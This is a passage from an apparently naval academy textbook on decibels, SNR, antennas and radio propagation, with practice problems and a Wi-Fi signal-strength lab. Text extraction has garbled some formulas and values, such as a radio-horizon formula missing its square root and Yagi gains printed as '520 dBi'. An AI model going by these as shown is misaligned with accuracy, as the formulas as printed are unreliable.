3,dB . Here, it is okay that dB and dBm are mixed on the right side of the equation, because all of the decibel values represent unitless numbers; it’s just that the input and output power values’ decibel values must be computed relative to 1 mW. If the input and output powers are in W instead of mW, Pout ,dBW = Pin,dBW + AP1,dB + AP2,dB + AP3,dB . Adding and subtracting decibels can be a much simpler operation than multiplying and dividing very large or very small decimal numbers. A common mistake midshipmen make when dealing with decibel values is that you should NEVER, EVER multiply or divide decibel values. Decibels are always added or subtracted from other decibels. Practice Problem 23.7 The diagram below represents the first three stages of a typical AM or FM receiver. Find the following quantities. (a) AT and AT,dB (b) AP1,dB, AP2,dB, and AP3,dB. (c) P1, P2, and Pout. (d) Pin,dBm, P1,dBm, P2,dBm, and Pout,dBm. 513 3. Noise and the Signal-to-Noise Ratio (SNR) Recall from Chapter 19 that noise is one of the principle limiting factors in the performance of communication systems, and that noise is added to our signal from external sources in the communication channel and also from internal (electronic) sources within our own system’s hardware. As we saw in Chapter 22, if significant enough, it can mask the original signal such that the signal becomes unrecoverable, or in the case of digital modulation, that bit errors can occur. This noise effect is not much different than if an enemy were to flood the air waves with an erroneous signal at the same frequency on which you were transmitting. If that erroneous signal was stronger at the receiver than your signal, your signal would become unrecoverable. How do we know the effect of noise on the signal, or the quality of the received signal in the face of noise? We use the signal-to-noise ratio (S/N, also referred to as SNR), which is the ratio of the power of a signal to the power of the noise corrupting that signal. A strong signal in weak noise results in a high SNR. A weak signal in strong noise results in a low SNR. Below are four samples of a sine wave with various amounts of noise added. The signal-to-noise ratio indicates the relative strengths of the signal and the noise in a communication system. The stronger the signal and the weaker the noise, the higher the SNR. Mathematically, SNR is defined as: SNR = æPö Ps and SNR dB = 10 log10 ç s ÷ . Pn è Pn ø Practice Problem 23.8 The signal power at the input to a receiver is 6.2 nW and the noise power at the input to that receiver is 1.8 nW. Find SNR and SNRdB. 514 Problems 1. Convert power gains of 100, 1000 and 2000 to decibel values. 2. Convert power gains of 0.01, 0.001, and 0.0005 to decibel values. 3. Convert decibel power gains of 13 dB, 33 dB, and 103 dB to power gains. 4. Three amplifiers with gains of 12.5, 4, and 20 are cascaded as shown in the following diagram (from left to right). The input power is 120 mW. What is the overall gain and the output powers of each stage? 5. A power amplifier has an output power of 200 W and an input power of 8W. What is the power gain in decibels? 6. A power amplifier has a gain of 55 dB. The input power is 600 mW. What is the output power in W? 7. An amplifier has an output power of 5W. What is this amount of power in dBm? 8. A communication system has five stages, with gains and attenuations of 12 dB, -45 dB, 68 dB, -31 dB and 9 dB. a. What is the overall gain in dB (AT,dB)? b. The overall power gain (AT)? c. If the input power is 1 dBm, what is the output power in dBm? 9. The signal input power to a receiver is 6 W. The noise power is 25 mW. What is the SNR? What is SNR dB? 10. A receiver’s sensitivity is the minimum received signal power for the receiver to successfully recover the transmitted signal. If a receiver’s sensitivity is -45 dBm, and the received power is 10 μW, will the receiver be able to recover the transmitted signal? 515 516 Security Exercise 23 Introduction to Wireless Signals Discussion: In the wireless section of the course so far, you have learned that we transmit information using EM waves in free space. If we encode some meaningful data onto these waves, we can communicate without being physically tethered to the medium. But how far away can we be? How close to the transmitter must we be in order to receive the message and successfully recover the information? Just like our human voice only travels so far when we shout, radio waves only travel so far from the transmitting station. At some point, you will just be out of range. Fortunately, we can measure the strength of the transmitter (how loud it can “shout”) and the sensitivity of a receiver (how quiet a sound it can still “hear”) When we put these measurements on a logarithmic decibel scale and compare their utility, we can figure out things like: What is the optimal location for a transmitter? Where is the best spot to get reception? Which devices receive a better signal? These are things you probably do with your cell phone all the time. Today we will do an experiment and see if we can answer these questions scientifically. Objective: To provide hands on experience and further familiarize each Midshipman with power measurements in a wireless communication system, and the effects of distance from the transmitter to the receiver. Set-up. Equipment required: Your issued Laptop Xirrus software: I. Measuring Signal Strength from your Local WiFi □ □ On your laptop, check the wireless connections and you should see a list of devices. One of the devices is the wireless Access Point (AP) in your classroom named cyber2_xx. The xx is your room number. If you do not see the specific AP for your room, tell your instructor. Once you see your cyber2 AP, start Xirrus Wi-Fi Inspector by double clicking the icon on your desktop. Let’s explore the Xirrus Graphical User Interface (GUI) shown on the next figure. You should identify each of the following parts on the display (identified with letters a-e) and then perform any specific instructions on your laptop. a) Start by clicking on settings and turning “Locate Sound” to Off. Click OK. b) In the upper left is the “Radar Display.” This shows the relative signal strength of an AP. The stronger the AP, the closer it is to the middle of the display. It doesn’t correlate with specific direction of the AP relative to you, but it will converge to the center as strength increases. c) In the center top is “Connections” which lists the details of the AP you are connected to. d) Below that is “Networks” which lists of all the AP’s you can observe with their respective data. e) “Signal History” is a time versus signal strength (in dBm) graph of the AP you are trying to locate. Highlight the cyber2_xx node, then right click and choose locate cyber2_xx and you should see it appear on the signal history plot. 517 Question1: For your cyber2_xx AP, write the following details down on the lower left corner of the map on the solution page. SSID (Service Set Identifier) - the wireless network name BSSID (Basic Service Set Identifier) - the MAC address of the wireless interface unit Channel - allows the carrier frequency to be separated into bands to keep from overlapping Frequency - carrier frequency the AP is using for communications □ Now that we have Xirrus running, we can take some measurements of the signal strength. Look at the Networks display list in the middle (d above), find your AP, highlight it and note the dBm. Question 2: Record the signal strength noted for your AP on the table on the last page of the lab under classroom. Question 3: Assume you record the signal strength of some other fictional access point when you are standing next to it as -30 dBm. Next, you walk some distance away from it and take another signal strength measurement and record it as 33 dBm. By what factor has the signal strength dropped from measurement one to measurement two? (Hint: convert each measurement to mW then divide measurement two by measurement one). Recall that: P(in mW) = 10 P ( dBm ) 10 Keep this realization in mind when answering the following questions: A SMALL CHANGE IN DECIBELS CAN MEAN A LARGE CHANGE IN POWER! Question 4: Staying highlighted on your assigned AP, move from point to point on the map and record the signal strength (dBm), allowing a period of time to let the value settle. Note if the dBm falls much below -90 it may drop from your list. You can locate it again by returning closer to the classroom. Simply record -90 dBm if your AP is lost at any point on the map. Question 5: Convert your dBm measurements to mW and finish filling in the table. Question 6: Observations: a) b) c) d) At what locations did you receive the strongest signal? The weakest signal? Would you expect to stay connected to this AP in Maury Hall? Why? Have an instructor check your results. 518 2. The Hunt for an Unknown AP □ Understanding how Xirrus reads signal strength, we will now try to locate an unknown AP using the Xirrus program. This AP is not located in your classroom, but you should be able to pick up the signal in your hallway. a) Try to find the AP with SSID Bad_Egg_xx ( again with xx indicating your class room). b) Turn On the “Locate Sound” in Settings and change the polling time to 1 second. Right click on Bad_Egg_xx in the Networks list and select Locate. This will create a ping. The closer the pings are together, the stronger the AP’s signal. c) Begin walking through the lab deck following your ping, dBm and Radar in a direction that makes the signal stronger. Question 7: Where is the AP located? What is the message that is written on the AP? Question 8: Emissions controls in the military refers to controlling your Radio Frequency Emissions. Keeping “The Hunt” from above in mind, why might it be important to maintain radio silence at certain times in Navy and Marine Corps? This SX contributed by Captain Ryan Whitty, USMC. 519 520 Security Exercise 23 Answer Sheet Name: Questions 1/2/4/5: Question 3: ______________________________________________________________________________ Question 6: a) b) c) d) _________________________ Instructor/Lab Tech Signature ______________________________________________________________________________ Question 7: ______________________________________________________________________________ Question 8: a) b) ______________________________________________________________________________ 521 522 Chapter 24: Antennas Objectives: (a) Describe the role of an antenna in a wireless communication system. (b) Explain the difference between power gain and antenna gain, and compute an antenna's gain relative to an isotropic point source (dBi). (c) Describe the advantages and disadvantages of directional antennas. (d) Describe the role of directors and reflectors in the design of a Yagi Antenna. (e) Interpret an antenna's radiation pattern to determine the sidelobe level and front-to-back ratio in dB, the beamwidth, and directions from which interfering or eavesdropping antennas may lay. Connection to Cyber Security Modulated signals are amplified to raise their power (Chapter 23), and then if free-space is the communication channel, transmitted and received using an antenna. A necessary part of a free-space communication system, antennas serve as the bridge from the transmitter and receiver to the communication channel. However, unlike a wire-based communication system, free-space is an open medium, and anyone with an antenna can collect transmitted signals or transmit their own signals. This makes free-space systems particularly vulnerable to cyber attacks involving eavesdropping and jamming. I. Antenna Characteristics An antenna is a device that provides a transition between guided electromagnetic waves in electrical circuits to electromagnetic waves in free space, and can be a length of wire, a metal rod, or a piece of metal tubing. Recall that wavelength () and frequency (f ) of an electromagnetic wave in free space are related by the speed of light (c), where c = 3.0 x 108 m/s: c l= . f The length of an antenna is usually expressed in terms of the wavelength () of the frequencies being transmitted. Low frequencies imply long wavelengths, hence low frequency antennas are very large (for example, the towers across the Severn River are used for the VLF Submarine Broadcast, 30 kHz and are hundreds of feet high). High frequencies imply short wavelengths, hence high frequency antennas are usually small (for example, the Dish Network transmission frequency from the satellite to your satellite dish is 12 GHz, and the antenna is approximately 1 cm long) Antennas are dual function, meaning that an antenna designed to transmit a certain frequency can also receive that frequency. When selecting an appropriate antenna for a communication system, there are four key criteria that must be evaluated: antenna gain, antenna beam pattern/beamwidth, antenna bandwidth and physical size. 1. Gain – Antennas are not amplifiers as you saw in Chapter 23, and the power out of the antenna is no more than the power in. However, because antennas focus power in certain directions, we say that an antenna can have a gain. Antenna gain determines how concentrated the transmitted power is in a particular direction (usually the direction of maximal radiation), or how well the antenna can receive signals from a particular direction. Higher gain means a stronger signal, making communication over longer distances possible. Conversely, we could communicate over the same distance with less transmit power. Note that some antennas use a parabolic dish to further increase antenna gain (such as the satellite dish for home satellite TV—the actual antenna is still 1 cm long, but the dish is much bigger). Isotropic antennas are theoretical antennas that have no directionality, and radiate their power equally in all directions. Consider the figure below. On the left is an isotropic antenna, located at the center of the sphere. The power it transmits is spread equally in all directions, in a spherical shape. If it transmits 1 W, that 1 W will be spread over the surface of the sphere, so as you move farther from the antenna, the received power per unit area drops dramatically. On the right is a directional antenna. If this antenna also transmits 1 W, that power is spread over a much smaller surface area, as indicated, so that in the direction the antenna is pointing, the reduction in power is 523 much less as you move farther from the antenna. The antenna gain is a measure of power transmitted by a directional antenna in the direction it is pointing relative to that transmitted by an isotropic source. The mathematical definition of antenna gain is G= Radiated power density at distance x from directional antenna . Radiated power density at distance x from isotropic antenna If we convert this to decibels, because we are comparing relative to an isotropic antenna, it is common to use dBi instead of dB. To compute antenna gain in decibels, we have GdBi = 10 log10 (G ) (dBi). Similarly, to convert from dBi to ratio we use GdBi G = 10 10 (unitless). Light can be used as an analogy to antenna gain. Imagine a single light bulb five feet from a wall. The light bulb sends light equally in all directions similar to how an isotropic antenna sends radio waves equally in all directions. When we put the lightbulb in a flashlight, the design of the flashlight focuses light in a single direction and the portion of the wall still illuminated by light will consequently be brighter. This is similar to how a directional antenna focuses radio waves in a particular direction and is able to affect communications over longer distances (e.g., satellite communications). Antenna gain can be thought of as how much brighter the wall is with the flashlight versus how bright it was with only the light bulb. A related characteristic of transmitting stations in a wireless communication system is the Effective Isotropic Radiated Power (EIRP), which is the product of the transmit power and the antenna gain: EIRP = Pt Gt (Watts) Here, the subscript t indicates that this is transmitter power and transmit antenna gain. In decibels, . EIRP is the amount of power that an isotropic antenna would have to transmit to achieve the same received power as a directional antenna at the same distance. To better explain this, let’s return briefly to our flashlight analogy. Let’s say I have 1W being sent into my flashlight which is five feet from the wall. The wall will then be a certain brightness. If we then remove the lightbulb from the flashlight and stay five feet away, the wall will get dimmer as we’ve previously discussed. EIRP is how much power I would now need to send into the lightbulb, without the flashlight, in order to make the wall as bright as it was with the flashlight. An antenna with directional gain has some advantages over an isotropic antenna. These include: Because energy is only sent in the desired direction, the possibility of interference with other transmitters at or near the same frequency is reduced. More focused power results in increased gain, which means that less power is required. 524 Controlling the direction of the beam can help prevent eavesdropping since you must be in the beam in order to receive the signal. A narrow beam can reduce the likelihood of detection in a covert setting for the same reason as was just discussed. However, directional antennas don’t work well in mobile situations (imagine keeping your cell phone pointed at a cell tower as you’re driving past it) and they can be physically large if gain is big. Practice Problem 24.1 A radio station has an EIRP of 25 kW and a transmit power of 1.73 kW. What is the gain of the antenna? 2. Beam Pattern/Beamwidth – Beam pattern is a diagram that shows specifically what direction(s) the antenna favors. You can think of a radiation pattern being created by having an antenna radiate a constant power (say 1 W, although any power will do), and then with a power meter, walk in a complete circle 1 km (or any other constant distance) from the antenna and record the power received at each point along the circle. The result will look something like the following figure. An example radiation pattern is shown in this figure in red. In this pattern, relative bearings are shown with 0° being the direction the antenna is pointing. In this figure, each circle represents a change in received power of 3 dB, and the maximum power is along the 0° bearing. There are six lobes of transmitted power showing. The mainlobe is oriented towards 0°, the direction the antenna is pointing. There are four sidelobes, oriented towards ±60° and ±120°, and a backlobe, oriented towards 180° (directly away from where the antenna is pointing). In many cases, the mainlobe’s maximum value will be defined as 0 dB, and the power levels at all other points on the pattern are the number of dB less than the max; this is a measure of power relative to the max power. This form of a radiation pattern is only one of many that could be used; sometimes the rings are not in dB, sometimes they represent power density (W/m2), or power (dBW or dBm), etc. But the general features of the beam pattern will be similar. In actuality, antennas radiate in 3-dimensions but the radiation patterns we will focus on are 2-dimensional, like the one shown above. 525 From the radiation pattern, a few new terms that describe the properties of the antenna come about. The sidelobe level (SLL) is a measure of the strength of the sidelobes compared to the mainlobe in decibels. The sidelobe level is measured from the peak of the main lobe to the peak of the largest sidelobe. Mathematically, SLLdB = Gmainlobe(dB) - Gsidelobe(dB) . For the antenna with radiation pattern on the previous page, the largest sidelobes are at ±60°, so SLLdB = 0 dB – (– 16 dB) = 16 dB. Similarly, the front-to-back ratio (FBR) is a measure of the strength of the mainlobe to the strength of the back lobe in decibels. Mathematically, FBRdB = Gmainlobe(dB) - Gbacklobe(dB) . For the antenna with radiation pattern on the previous page, the backlobe is at –17 dB, so the front-to-back ratio is FBRdB = 0 dB – (– 17 dB) = 17 dB. Finally, note that the radiation pattern has some bearings that are not a part of any lobe, for example ±35°. These are called nulls of the pattern, and at these bearings, no power is transmitted from this antenna (or perhaps a miniscule amount), nor can this antenna cannot receive signals from these bearings. 3. Beamwidth – Beamwidth is based on the relative bearings where transmitted (or received) power is reduced by a factor of ½ (or -3 dB, since 10 log10 (½) = -3) from the direction of max power. We call these points on the diagram the -3 dB (or half-power) points. The beamwidth is the angle that subtends these points. The following figure shows the beamwidth computation for the above beam pattern; the beamwidth is 20°. A narrow beamwidth (small angle) means the antenna is very directional. 4. Bandwidth – Bandwidth determines the range of frequencies that the antenna is best suited for. Broadband signals (that is, signals with a very wide bandwidth) transmit more data at a faster data rate, but broadband antennas are harder to design/build. An antenna is normally designed for a certain transmit frequency, but can be used successfully for a range of frequencies around that. 5. Physical Size – Physically larger antennas have a higher gain and narrower beamwidth, but are much harder to conceal. Also, the system using the antenna may introduce its own constraints (e.g., no one wants to mount a 6 meter dish on the roof of their car). Antennas radiate most effectively when their length is directly related to the wavelength of the transmitted signal. Most antennas have a length that is some fraction of a wavelength. One-half and one-quarter wavelengths are most common. 526 Practice Problem 24.2 Consider the antenna with this radiation pattern: 1. What is the beamwidth of this directional antenna? 2. What is the sidelobe level? 3. What is the front-to-back ratio? 4. Will a station transmitting bearing 90° interfere with me? Will I interfere with it? 5. Will a station bearing 240° be able to eavesdrop on my communications? 6. Suppose the receiver I am communicating with (at 0°) requires that the signal received be at least 1 pW. Will I have to transmit more power or less power using this antenna than if I were using an isotropic antenna? Why? II. Dipole Antenna One of the most widely used antenna types is the half-wave dipole. A dipole antenna is two pieces of wire, rod, or tubing that are one-quarter wavelength long at the operating frequency connected to a voltage source (these are the poles). The antenna is formed by placing these poles at a 90° angle from the transmission lines that are carrying the signal to be transmitted. This is depicted in the figure below. The most efficient radiation of EM waves comes when the total length of the antenna is λ/2 long, which is why the antenna is called the half-wave (λ/2) dipole antenna. 527 The radiation pattern for a horizontally oriented dipole antenna is shown below (on the left). The dipole is the heavy black line segment. The scale is not in dB, but this is the general shape. It is bidirectional, in that there is a backlobe that is as large as the mainlobe, both emanating perpendicular to the orientation of the dipole. If the dipole is oriented vertically, the radiation pattern is omnidirectional, as shown on the right. The 3-dimensional radiation patterns for the horizontally and vertically mounted dipole are shown on the next figure. Note that the 2-dimensional patterns above are cutaways of the 3-dimensional patterns. Major Parameters for the Dipole Antenna: 1. Beam Pattern/Beamwidth – A dipole mounted vertically has the 2-dimensional beam pattern in the azimuth plane shown in the figure on the previous page, and a -3 dB beamwidth of 78º. The vertically mounted antenna has an omnidirectional pattern in the azimuth (energy is spread equally in all directions). 2. Gain – A dipole has a gain of G = 1.64, or GdBi = 2.15 dBi. 3. Bandwidth – A dipole typically has a bandwidth that is ~25% of the center frequency of transmission. 4. Physical Size – A dipole has a physical size equal to λ/2, where λ is the wavelength of transmission. Practice Problem 24.3 A transmitter feeds a half-wave dipole antenna with 100 watts of power. Calculate the Effective Isotropic Radiated Power (EIRP). 528 Practice Problem 24.4 How long would a dipole antenna be for AM 1100? III. Monopole Antenna The quarter-wave (λ/4) monopole antenna, also called a Marconi antenna, is widely used. It’s characteristics are similar in to a vertically mounted dipole antenna, except that the monopole is connected to a ground plane (such as the earth), and uses it as a as a type of electrical “mirror” to reflect transmitted or received energy upwards to contribute to the upper part of the radiation pattern. Effectively, the ground plane acts as the “missing” half of a dipole antenna. The 3-dimensional radiation pattern for the vertically mounted λ/4 monopole is shown in the following figure (on the left), and a slice of the pattern (2-dimensional pattern in the vertical direction) is shown on the right. Major Parameters for the Monopole Antenna 1. Beam Pattern/Beamwidth – A monopole has an omnidirectional pattern in the azimuth (energy is spread equally in all directions), and a -3 dB beamwidth of 45º in the vertical plane. 2. Gain – A monopole has a gain of G = 1.45, or GdBi = 1.6 dBi. 3. Bandwidth – A monopole typically has a bandwidth that is ~10% of the center frequency. 4. Physical Size – A monopole has a physical size equal to λ/4. Practice Problem 24.5 The ballistic submarine, USS Alaska, has gone alert. They must stream a floating wire monopole antenna to get their alert signal. If the alert signal is transmitted at 30 kHz, how far should they stream their antenna? (note: the antenna being streamed is a straight wire) 529 IV. Yagi (Yagi-Uda) Antenna The Yagi-Uda was developed in Japan in 1926 by Professor Hidetsugu Yagi and his student Shintaro Uda. Their basic concept and structure is still used across a wide variety of modern antenna designs, and the Yagi-Uda is still the “go-to” antenna for high gain at VHF and UHF frequencies. There was a time when every home in America was equipped with a Yagi antenna, on their roof to allow reception of broadcast television. A Yagi antenna is composed of a driven-element (a dipole antenna) and multiple parasitic elements. A driven-element is one that is connected electrically to the transmitter. Parasitic elements are not connected electrically, but are placed in the vicinity of the driven element to either side. These parasitic elements (known as reflectors and directors) will resonate with the electric field produced by the dipole. Reflectors are longer than the dipole antenna, are all placed on one side of the dipole, and reflect the transmitted EM waves back towards the dipole antenna. Directors are shorter in length than the dipole, and “direct” EM waves from the dipole and reflectors to form the mainlobe. Judicious spacing of the parasitic elements will allow us to produce constructive interference and “push” energy in the forward direction, giving the Yagi-Uda good gain. The effect of directors and reflectors is: More parasitic elements means higher gain and narrower beamwidth. Adding more directors is more effective than adding more reflectors. The greater the number of directors, the higher the gain and the narrower the beamwidth. However, we get diminishing returns as more elements are added. Most Yagi antennas have 1 reflector and 1-20 directors. Here is a Yagi-Uda with one director and one reflector. This is a three-element Yagi. The simplest Yagi, consisting of a driven element and one reflector, shown on the bottom of the prior page, has a gain of about 5 dBi. Practice Problem 24.6 What is the length of the driven element in a Yagi at 290 MHz? 530 A manufacturer of Yagi antennas is the L-Com Global Connectivity corporation (www.l-com.com). Here’s an example pattern of one of their 900 MHz Yagi antennas (model HG906YE-RSP). The driven element (dipole) has a cable connected to it. This Yagi has 1 reflector and 2 directors, and a gain of 6 dBi. The horizontal beamwidth is 100°, vertical beamwidth 60°. Compare that to their model HG914YE-RSP antenna, which has 1 reflector, 11 directors, and 14 dBi of gain. The horizontal beamwidth is 31°, vertical beamwidth 28°. All else being equal, which is the antenna with the higher gain a “better” antenna? Well, unfortunately all else is not equal. The 6 dBi Yagi is only 14.2 inches long while the 14 dBi Yagi is a whopping 60 inches (that’s 5 full feet) long, almost six times the length of the 6 dBi antenna. If constrained by size, the 6 dBi antenna may be the better choice. Although the Yagi antenna does a good job at directing (and receiving) energy from the forward direction (in the main lobe), its sidelobes are fairly large in comparison. Major Parameters for the Yagi Antenna 1. Beam Pattern/Beamwidth – A Yagi is a directional antenna that transmits energy in a main lobe, but with fairly high side lobe levels. The beamwidth is dependent on the number of parasitic elements, with more elements resulting in a narrower beamwidth. 2. Gain – A Yagi’s gain is directly proportional to the number of parasitic elements, with typical gains in the range of 520 dBi (You will never be asked to calculate the gain of a Yagi antenna based on its dimensions). 3. Bandwidth – A Yagi is typically very narrowband, with a bandwidth ~5% of the center frequency. 4. Physical Size – A Yagi’s dipole radiator has a physical size equal to λ/2, but the length is determined by the number of directors. Directors are typically spaced in half-wavelength increments. You should be familiar with the four major parameters for the following three antennas: Dipole Monopole Yagi-Uda 531 532 Problems 1. What are the 4 engineering factors associated with the design of antennas? 2. a) Calculate the length, in meters, of a dipole antenna that is designed to receive a station at AM 800 on the dial of an AM radio. b) Calculate the length, in meters, of a monopole antenna that is designed to receive the FM station at 107.1MHz. 3. Given the following radiation pattern, where each ring represents a 1 dB change in power, what is the beamwidth? The sidelobe level? The front-to-back ratio? 4. Given the following radiation pattern, where each ring represents a 2 dB change in power, what is the beamwidth? The sidelobe level? The front-to-back ratio? 5. The power applied to an antenna with a gain of 4 dB is 13 W. What is the EIRP? 6. What does it mean for an antenna to have directivity, and what are the advantages and disadvantages of a directional antenna? 7. Name and describe the three basic elements in a Yagi antenna. 533 8. The length of the driven element in a Yagi antenna is 900 mm; what is its operating frequency? 9. The mainlobe of an antenna has a maximum gain value of +18 dB at its peak point of forward direction. The same antenna has a gain of −5dB at the peak point of its rear lobe. Determine the front-to-back ratio of the antenna. 10. Yagi antennas A and B both have a driven element designed to transmit/receive 100 MHz. Yagi antenna A has 1 director and 3 reflectors, while Yagi antenna B has 1 director and 7 reflectors. Describe the differences you would expect to see in their radiation patterns. 534 Security Exercise 24 Reserved. 535 536 Chapter 25: Propagation Objectives: (a) Define reflection, refraction, diffraction and scattering. (b) Describe the characteristics of ground waves, sky waves, and space waves. (c) Calculate the radio horizon distance for space waves based on antenna height. (d) Compute received power level for a communication system using Friis Free Space equation. (e) Using the log-normal propagation model, compute received power, path loss or transmission distance. Connection to Cyber Security In a wireless communication system, the transmitter transmits a modulated signal into free-space using an antenna. The signal then propagates through free-space until it reaches the receive antenna. Along the way, the transmitted signal loses power, so that by the time it gets to the receiver, the received power can be extremely low. If the received power is too low, the receiver will not be able to recover the information. In this chapter, you’ll be introduced to the various ways that signals can propogate through free-space, and also how to compute the received power. Cyber attacks against wireless communication systems can take advantage of a low received signal power to jam the transmission, or to take control of the communication link. I. Wireless Propagation Propagation is the means by which a signal moves from Point A to Point B. It sounds simple, but it is the most fundamental and challenging aspect of wireless communications. In a wired system (such as an Ethernet network), propagation is not really a concern per se. However, wireless transmission requires a fundamental understanding of how electromagnetic waves move through the atmosphere. The challenges of propagation in free-space include the fact that the transmitter and/or receiver may be moving, obstacles in the path of propagation, a path that is not necessarily a straight line, and a signal that takes various paths to get to the receiver. In general, we can think about radio frequency propagation in two broad categories: large scale and small scale. Our emphasis in EC310 is on understanding large scale propagation (longer distance), although many engineers have devoted their entire careers to understanding and modeling small scale propagation. In fact, you’ve likely experienced a small scale propagation issue numerous times without ever realizing it. The classic example would be driving down the highway while talking on your cell phone and experiencing a dropped call. Large Scale Propagation – The behavior of the radio channel over large distances (100s or 1000s of wavelength of distance). Received power is directly related to distance between Tx and Rx, and is stationary with respect to time. Small Scale Propagation – The behavior of the radio channel over a small local area (1-10 wavelengths of distance) and/or of small time durations. Received power fluctuates rapidly based on position, speed, direction of travel, etc. of the mobile. II. Large Scale Propagation A. Physical Phenomena Large scale propagation is affected by four physical phenomena: Reflection – the bouncing of EM waves off of surrounding objects, such as vehicles, buildings, etc. Refraction – the bending of EM waves as they travel through mediums of different material Diffraction – bending of EM waves around objects Scattering – diffuse re-radiation of EM waves off rough (smaller than the signal’s λ) objects Let’s look at these briefly one at a time. 537 1. Reflection Reflection occurs when a transmitted EM wave strikes a conductive object (such as a metallic object) on its path to the receiver. As you recall from physics, in reflection, if the object is flat, the angle of reflection is equal to the angle of incidence. 2. Refraction When an EM wave passes from one medium to another, the EM wave’s path can change direction (bend). In wireless communications, we see this when EM waves directed towards the sky go up into the ionosphere, and eventually bend back down to earth as depicted in the figure below. 3. Diffraction Diffraction is the bending of EM waves around objects in their path, even behind them to some extent. Consider a transmitter and receiver where an object is blocking the direct line-of-sight path between them. The signal can diffract around the object such that the signal can get to the receiver even though it is shadowed. Note that the more deeply the receiver is shadowed, the lower the received power, and in some cases, the receiver may not be able to receive any signal. The concept of diffraction is illustrated below. 1. 4. Rough Surface Scattering Sometimes called diffuse scattering or diffuse reflection, scattering happens when an EM wave impacts a rough surface and is re-radiated in many directions at much reduced power levels . So those are the basic physical phenomena propagation. What happens when we add in a real earth and a real atmosphere? The earth and the earth’s atmosphere have the greatest impact on signals in the VLF – HF range (3 kHz – 30 MHz). It’s not that the earth and atmosphere don’t affect signals at higher frequencies, it’s just at those higher frequencies other factors come into play and dominate the effects of the earth/atmosphere. Let’s look at what happens to these lower frequencies first before moving on to the higher frequencies. 538 Frequency Range Frequency Range Propagation Mode VLF (Very Low Frequency) 3 kHz – 30 kHz - Ground waves LF (Low Frequency) 30 kHz – 300 kHz - Ground waves MF (Medium Frequency) 300 kHz –3 MHz - Ground waves, sky waves at night HF (High Frequency) 3 MHz – 30 MHz - Sky waves VHF (Very High Frequency) 30 MHz –300 MHz - Space waves UHF (Ultra High Frequency) 300 MHz – 3 GHz - Space waves SHF (Super High Frequency) 3 GHz – 30 GHz - Space waves EHF (Extremely High Frequency) 30 GHz – 300 GHz - Space waves B. Modes of Propagation For VLF-HF communications, there are three basic modes a radio wave can travel from the transmitter to a receiving antenna: Ground wave – EM waves that travel close to the surface of the earth Sky wave – EM waves that travel up into the atmosphere and then bend back to earth Space wave – EM waves that travel in a straight line (direct line-of-sight or LOS) The frequency of the radio wave is the most important factor in determining the mode and performance of each mode of propagation. 1. Ground Wave Propagation A ground wave is a radio wave that travels along the earth’s surface (also referred to as a surface wave). A ground wave must be vertically polarized; that is, the antenna must be oriented vertically. Lower frequencies travel efficiently as ground waves because they are diffracted by the surface of the earth. Ground waves thus follow the curvature of the earth and can travel beyond the horizon, for hundreds of miles. Ground wave propagation is strongest in the LF and MF frequency ranges. Ground wave propagation constitutes the main signal path for signals in the frequency range from 30 kHz – 3 MHz. 2. Sky Wave Propagation Sky waves are radiated by an antenna into the upper atmosphere where they are reflected or refracted back to earth. The air molecules of the ionosphere are subject to severe radiation from the sun. Ultraviolet radiation causes the molecules to ionize, or separate into charged particles, positive and negative ions. This separates the upper atmosphere into different layers (or mediums) that promote reflection or refraction. The direction of reflection depends on the angle at which the radio wave enters the atmosphere and the different degrees of ionization of the layers, as well as the frequency of the transmission. 539 3. Space Wave Propagation A space wave refers to the radio wave that travels directly in a straight line from the transmitting antenna (LOS). These waves are not refracted, and do not follow the curvature of the earth. The chief limitation of a space wave is that it is limited to line-of-sight distances. The range of space wave propagation is limited by the curvature of the earth and height of the antennas above the earth’s surface. If an antenna has a height h above the surface of the earth, the distance, d, to the radio horizon (which is the maximum range for space wave communications from that antenna) is given by the formula d = 2h. Important: In this formula, the height of the antenna is in feet, and the distance to the horizon is in miles. That is, if you plug in the antenna height in feet, the resulting distance value will be in miles. The next figure demonstrates the maximum distance that two stations can be apart and still conduct line-of-sight communication. This figure shows one antenna of height h1 and a second antenna of height h2. The maximum separation at which they can still communicate by line-of-sight is given by: dtotal = 2h1 + 2h2 . Practice Problem 25.1 What is the longest line-of-sight communication range between a transmitter whose transmitting antenna is 350 feet high and a receiver whose receiving antenna is 25 feet high? Now that we’ve covered all the glories of Large Scale Propagation in real-world environments, it behooves us to look at the most basic way we can transmit energy from Point A to Point B in an environment devoid of terrain, mountains, buildings, 540 ground, or atmosphere. Such an environment is known as Free Space, and conveniently, wireless propagation in such an environment is known as Free Space Propagation. III. Free Space Propagation Let’s consider the following scenario. You have a brand-new iPhone (or Samsung phone as the case may be), have just signed up for a super-fast LTE plan, and would like to upload a photo, surf the web, browse Facebook, or just plain make a phone call. To make that happen, your phone has to transmit that information over the air to the nearest LTE cell tower (cost: $5 Million, that’s why your phone bill is $100/month), which happens to be 5 miles away. Question: Will your signal make it to the tower and will it have sufficient power to “close the link” and allow you communicate? Or will you suffer the fate of a cellular “dead zone”? That depends on the amount of signal power that is received. Recall from Chapter 24 the discussion of antenna gain. An antenna has gain if it can focus its transmitted power (or can receive power) in a certain direction, as opposed to an isotropic antenna that radiates (or receives) power equally in all directions (in a spherical shape). This led to the term effective isotropic radiated power (EIRP), which is the amount of power an isotropic antenna would have to radiate in order to match the power that a directional antenna radiates in the direction it is pointing. To figure out how to compute received power, let’s consider how an isotropic antenna radiates in a spherical shape. As EM waves move away from the isotropic antenna, the sphere gets larger and larger, until it touches our receive antenna. The transmitter transmits a constant power, however, the power density is going to decrease as the distance from the transmit antenna increases. Power density is the amount of power received per unit area (W/m2). The power density that reaches the receive antenna is going to be based on the surface area of a sphere, where the distance between the transmitter and receiver (d) is the radius of the sphere. Since the surface area of a sphere of radius d is given by Asphere = 4p d 2 the power density (Pd) at the receiver in units of W/m2 is: Pd = Pisotropic antenna Ae = EIRP Pt Gt = . 4p d 2 4p d 2 Now, the last thing we need to do is to turn that power density into the actual received power. Power density is power per unit area, so what is the “area” we are interested in? Since we are receiving the signal on an antenna, the “area” of interest is the area of the receive antenna. The derivation of the effective area of an antenna is beyond the scope of the course, but it is mathematically defined as: Ae = Gr l 2 . 4p Finally, we can put all this together and determine the equation for received power, which is received power density (W/m2) multiplied by effective area (m2): Pr = Pd × Ae = Pt Gt Gr l 2 Pt Gt Gr l 2 × = 4 p d 2 4p ( 4p d )2 where the variables are defined as: Pr Pt Gt Gr λ d Received power (W or mW) Transmitted power (W or mW) Transmit antenna gain (unitless) Receive antenna gain (unitless) Transmission wavelength (m) Distance between transmitter and receiver (m) 541 This is known as the Friis Free Space Equation. It is fundamental to understanding how received power is reduced as a function of distance 